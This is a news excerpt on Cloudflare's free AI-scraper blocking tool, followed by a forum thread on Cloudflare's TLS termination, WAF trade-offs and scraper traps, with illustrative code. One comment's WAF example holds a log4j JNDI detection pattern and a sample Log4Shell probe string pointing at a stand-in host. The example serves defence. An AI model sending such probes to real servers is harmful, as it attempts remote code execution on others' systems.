Cloudflare, the publicly traded cloud service provider, has launched a new, free tool to prevent bots from scraping websites hosted on its platform for data to train AI models.

Some AI vendors, including Google, OpenAI and Apple, allow website owners to block the bots they use for data scraping and model training by amending their site’s robots.txt, the text file that tells bots which pages they can access on a website. But, as Cloudflare points out in a post announcing its bot-combating tool, not all AI scrapers respect this.
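
For context, a robots.txt opt-out looks like the sketch below, along with how a well-behaved crawler would check it using Python’s standard robotparser. GPTBot, Google-Extended, and Applebot-Extended are the crawler names OpenAI, Google, and Apple document for AI-training opt-outs; the site URL is made up. Nothing in the protocol enforces compliance, which is exactly the gap Cloudflare’s tool targets.

```python
# Minimal sketch of a robots.txt opt-out and how a *well-behaved* bot
# checks it, using Python's stdlib parser. GPTBot, Google-Extended and
# Applebot-Extended are the documented AI-training crawler names; the
# example URLs are made up.
from urllib import robotparser

rules = """\
User-agent: GPTBot
Disallow: /

User-agent: Google-Extended
Disallow: /

User-agent: Applebot-Extended
Disallow: /
""".splitlines()

parser = robotparser.RobotFileParser()
parser.parse(rules)

print(parser.can_fetch("GPTBot", "https://example.com/article"))      # False
print(parser.can_fetch("SomeBrowser", "https://example.com/article")) # True
```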

  • schizo@forum.uncomfortable.business · 5 months ago

    I know we hate Cloudflare, but that’s a good feature addition.

    Went to turn it on for the domain covering some of my stuff, and they also directed me to their Radar site, which shows the volume of bot traffic and which bots are making the most noise. Not the least bit shockingly, it’s AI bots all the way down.

    If nothing breaks I’m totally leaving this on and Amazon, Google, and OpenAI can all go screw themselves.

    • MSids@lemmy.world · 5 months ago

      Can you educate me on the negatives of Cloudflare?

      My company is on Akamai, who has a pretty solid combined offering of WAF, DNS, and CDN, and yet I still feel like their platform is antiquated and well overdue for a refresh.

      Thinking back to log4j, it was Cloudflare who had the automatic protections in place well ahead of Akamai, whom we had to ask for custom filters. Cloudflare also puts out many articles on Internet events and pushes adoption of emerging best practices, sometimes through heavy shaming.

      • MigratingtoLemmy@lemmy.world · 5 months ago

        Cloudflare’s free CDN offering is a MITM (you must use their certificates, purely so your traffic can pass through their network). Adding to this, they control a lot of Internet infrastructure (comparable to Microsoft and Google). I hate all of these companies and specifically use Quad9 until I get my own DNS resolver running. It probably doesn’t matter to the end user, but I’m happy to see a technical crowd on Lemmy that shares my ideals about big tech.

        • 𝕸𝖔𝖘𝖘@infosec.pub · 5 months ago

          It can matter to the end user. I had to spoof my user agent because I was using a beta version of Firefox and Cloudflare thought I was a bot. Sites still sometimes don’t load at work (the page just keeps cycling through the “checking to make sure you’re a human” bullshit), regardless of browser. It’s a single point of failure for much of the web. Not that long ago (last year, I think), Cloudflare had some bad config files pushed to prod and about half the web broke. And Cloudflare can arbitrarily block websites (and has done so), since they’re the ones serving the content. In theory, CF is a great service. In practice, they’ve abused it enough that we really shouldn’t trust them again.

      • schizo@forum.uncomfortable.business · 5 months ago

        I’m not opposed to them, but a lot of people on Lemmy have pretty strong opinions, primarily around the centralization and the potential for MITMing of data.

        I don’t think they’re wrong, because the centralization has given Cloudflare a shocking amount of power over who sees what and how: they will, for example, put you in captcha hell if you’re using certain browsers, connecting from certain networks, or using Tor. I never run into those issues myself, but they happen to people often enough that a quick search turns up story after story of people hitting this mess, and it’s sometimes annoying and painful to dig out of when it happens.

        And, due to how their service works and the way the certificates are handled, they are essentially MITMing your traffic. Depending on how exactly you’ve configured it, the certificate chain between your client and Cloudflare, and between Cloudflare and your server, can be set up so that a re-encryption happens with them in the middle, and thus Cloudflare can see all your data.
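
        To make that concrete, here’s a minimal sketch of the terminate-and-re-encrypt pattern (not Cloudflare’s actual code; the origin URL and certificate filenames are made up). The client’s TLS session ends at the edge’s certificate, so requests are plaintext on the edge before the separate encrypted hop to the origin:

        ```python
        # Minimal sketch of the terminate-and-re-encrypt pattern an edge
        # proxy (CDN/WAF) uses. Origin URL and cert filenames are hypothetical.
        import ssl
        import urllib.request
        from http.server import BaseHTTPRequestHandler, HTTPServer

        ORIGIN = "https://origin.example.com"  # hypothetical upstream server

        class EdgeProxy(BaseHTTPRequestHandler):
            def do_GET(self):
                # The client's TLS is already terminated here: path, headers,
                # and body are plaintext, fully visible to the edge.
                with urllib.request.urlopen(ORIGIN + self.path) as upstream:
                    body = upstream.read()  # separate encrypted hop to origin
                self.send_response(200)
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)

        server = HTTPServer(("", 8443), EdgeProxy)
        # Clients see the *edge's* certificate, not the origin's.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ctx.load_cert_chain("edge-cert.pem", "edge-key.pem")  # hypothetical files
        server.socket = ctx.wrap_socket(server.socket, server_side=True)
        server.serve_forever()
        ```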

        I’ve met their CEO and VP of Safety and worked extensively with them in a previous job, and I don’t actually believe they’re doing anything untoward, but the fact is that they absolutely could if they so desired.

        I use their stuff on anything I set up for public access, either via an Argo tunnel or their more traditional CDN offering. But I can understand why other people concerned about user blocking and privacy wouldn’t be Cloudflare fans (those two groups being less a Venn diagram of impacted users and more a single circle: the privacy people are usually using exactly the browsers, addons, and VPN connections that trigger the blocks).

        • MSids@lemmy.world · 5 months ago

          The core features of a WAF do require SSL offload, which of course means the data is decrypted with your certificate on their edge nodes, then re-encrypted with your origin certificates. A WAF simply cannot protect against these exploits without breaking the encryption, and WAF vendors can put protections in place for emerging threats much faster than developers can.
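
          As an illustration of why (a hypothetical rule, not any vendor’s actual signature), matching something like the log4j JNDI string mentioned earlier in the thread only works on plaintext, i.e. after offload:

          ```python
          # Hypothetical WAF rule, not any vendor's actual signature: block
          # requests carrying a log4j-style JNDI lookup string. This check
          # is only possible on decrypted (offloaded) traffic.
          import re

          JNDI = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://", re.IGNORECASE)

          def should_block(path: str, headers: dict, body: str) -> bool:
              blob = " ".join([path, *headers.values(), body])
              return bool(JNDI.search(blob))

          # A classic Log4Shell probe arrives via the User-Agent header:
          probe = {"User-Agent": "${jndi:ldap://evil.example/a}"}
          print(should_block("/login", probe, ""))  # True -> blocked at the edge
          ```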

          I had never considered that Akamai or Cloudflare would be doing any deeper analytics on our data, as it would open them up to significant liability, just as I know for certain that AWS employees cannot see the data within our buckets.

          As for the captcha prompts, I can’t speak to how those work in Cloudflare, though I do know that AWS WAF leaves their sensitivity entirely up to the website owner. The free tiers of CF might offer fewer configurable options.

          • schizo@forum.uncomfortable.business · 5 months ago

            The captcha stuff is customizable, but yeah, you have to pay. The issue is that they have, in the past, shipped breaking changes in their default rules that made huge messes, and a huge portion of their customer base just uses the defaults. They’ve gotten better at this, but again, there’s nothing other than their testing to prevent it in the future.

            Also, based on experience doing infosec stuff, I can say that there’s ABSOLUTELY a huge portion of “admins” who think more security is more betterer and configure shit in ways that break so many things, then get mad that they did that. There’s a LOT of depth you have to understand to configure something like Cloudflare’s WAF properly, and way too many admin types don’t fully grasp the impact of any particular setting, get way way way waaaay too restrictive, and then get mad when it breaks things.

            The SSL offload requires you to trust your vendor, and I agree that the odds they’re doing anything suspicious are close to zero: their business would damn near instantly implode if they got caught. But, again, you’re trusting policy and procedure to keep people away from your data.

            I think there’s a LOT of bias toward “MITM” meaning “malicious”, and, with Lemmy ranging from very left to leftish, a huge bias against big tech (which, imo, is 100% warranted and totally earned by decades of shitty behavior). That shows up as “Cloudflare is bad because they MITM your traffic”, lacking the nuance that, well, every WAF and a heck of a lot of caching CDNs do exactly that, because that’s how the technology works.

  • FaceDeer@fedia.io · 5 months ago

    Now taking bets on how long it will be before Cloudflare announces that they’re selling AI training datasets based off of the content they’re managing…

    • lemmyvore@feddit.nl · 4 months ago

      That would be rather short-sighted of them. They rely on the free tier of their services for upselling and word of mouth. People are already wary of the fact that CF can snoop on what are supposed to be private connections, but so far they’ve used that only for good.

  • Malcolm@lemmy.world · 5 months ago

    I’m not much of a programmer and I don’t host any public sites, but how feasible would it be to build an equivalent of Nightshade, but for LLMs, that site operators could run?

    I’m thinking strategies akin to embedding loads of unrendered links to pages full of junk text. Possibly have the junk text generated by LLMs and worsened via creative scripting.

    It would certainly cost more bandwidth but might also reveal more bad actors. Are modern scrapers sophisticated enough to not be fooled into pulling in that sort of junk data? Are there any existing projects doing this sort of thing?
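
    Not aware of an existing project for this, but the hidden-link half of the idea is straightforward to sketch. Everything below is hypothetical (made-up paths, wordlist, and sizes); real junk text could come from an LLM and be degraded further by scripting, as suggested above:

    ```python
    # Hypothetical sketch of "unrendered links to junk pages": each junk
    # page links onward to more junk, forming a tarpit for naive crawlers.
    import random

    WORDS = ["latent", "gradient", "corpus", "token", "entropy", "scraper",
             "vector", "sampling", "decoder", "alignment"]

    def junk_paragraph(n_words: int = 80) -> str:
        """Plausible-looking nonsense to fill crawler-only pages."""
        return " ".join(random.choice(WORDS) for _ in range(n_words))

    def hidden_trap_link(i: int) -> str:
        # display:none makes the link invisible to human visitors, but a
        # naive scraper parsing raw HTML will still follow it.
        return f'<a href="/junk/{i}" style="display:none">{junk_paragraph(3)}</a>'

    def junk_page(n_paragraphs: int = 5) -> str:
        """One junk page, with hidden onward links to more of the same."""
        paras = "".join(f"<p>{junk_paragraph()}</p>" for _ in range(n_paragraphs))
        links = "".join(hidden_trap_link(random.randrange(10**6)) for _ in range(3))
        return f"<html><body>{paras}{links}</body></html>"
    ```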

    • Wirlocke@lemmy.blahaj.zone · 4 months ago

      To get more directly to the point, you could use those unrendered dummy links to ban whatever IPs request them (see the sketch below).

      And with the vast amounts of training data and how curated it’s becoming (Llama and Claude are going in that direction), it’s infeasible to actually poison a large model to that degree.
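
      A minimal sketch of that ban-on-touch idea (the trap path and in-memory set are hypothetical stand-ins for real middleware and a persistent blocklist):

      ```python
      # Minimal sketch: ban any client that requests a trap URL.
      banned_ips: set[str] = set()
      TRAP_PREFIX = "/junk/"  # target of the hidden links, never visibly linked

      def handle_request(ip: str, path: str) -> int:
          """Return the HTTP status to serve for this request."""
          if path.startswith(TRAP_PREFIX):
              banned_ips.add(ip)  # humans never see these links; only bots arrive
          return 403 if ip in banned_ips else 200

      print(handle_request("203.0.113.7", "/junk/42"))  # 403: banned on first touch
      print(handle_request("203.0.113.7", "/home"))     # 403: still banned
      ```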

    • GBU_28@lemm.ee · 4 months ago

      Sure, but it adds cost: an OCR scrape, then matching it against the HTML parse.

      Regarding ideas of IP banning, proxies are already heavily leveraged.

      This is an ugly fight.
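
      The HTML-parse half of that matching is actually cheap for the scraper, which is part of what makes it an ugly fight. A rough sketch (BeautifulSoup assumed installed; only inline styles handled, the OCR half omitted):

      ```python
      # Rough sketch of the HTML side of an "OCR vs. HTML parse" comparison:
      # drop inline-hidden nodes, then extract text to diff against OCR output.
      # Requires: pip install beautifulsoup4
      from bs4 import BeautifulSoup

      def visible_text(html: str) -> str:
          soup = BeautifulSoup(html, "html.parser")
          for tag in soup.find_all(style=True):
              style = tag["style"].replace(" ", "").lower()
              if "display:none" in style or "visibility:hidden" in style:
                  tag.decompose()  # discard hidden trap links / junk text
          return soup.get_text(" ", strip=True)

      html = '<p>Real article.</p><a href="/junk/1" style="display: none">junk</a>'
      print(visible_text(html))  # "Real article." -- the trap link is gone
      ```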